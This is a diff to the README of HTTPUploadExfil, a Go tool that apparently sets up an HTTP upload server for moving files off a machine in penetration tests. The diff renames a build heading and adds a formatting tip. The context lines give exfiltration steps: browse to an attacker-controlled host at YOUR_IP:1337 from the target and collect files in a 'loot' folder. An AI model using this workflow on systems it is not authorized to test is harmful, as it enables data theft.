IngoKl/HTTPUploadExfil/README.md

 3) Access `http://YOUR_IP:1337/` on the machine you need to exfiltrate data from.
 4) Find your uploaded files in `/home/kali/loot`.

-## Building
+## Building and Developing

 It's trivial to build this tool.

 Simply run `go build` within the folder, and you should get an `httpuploadexfil` executable for your platform.

+If you make changes to the tool, remember to format using `go fmt main.go`.

 ## Usage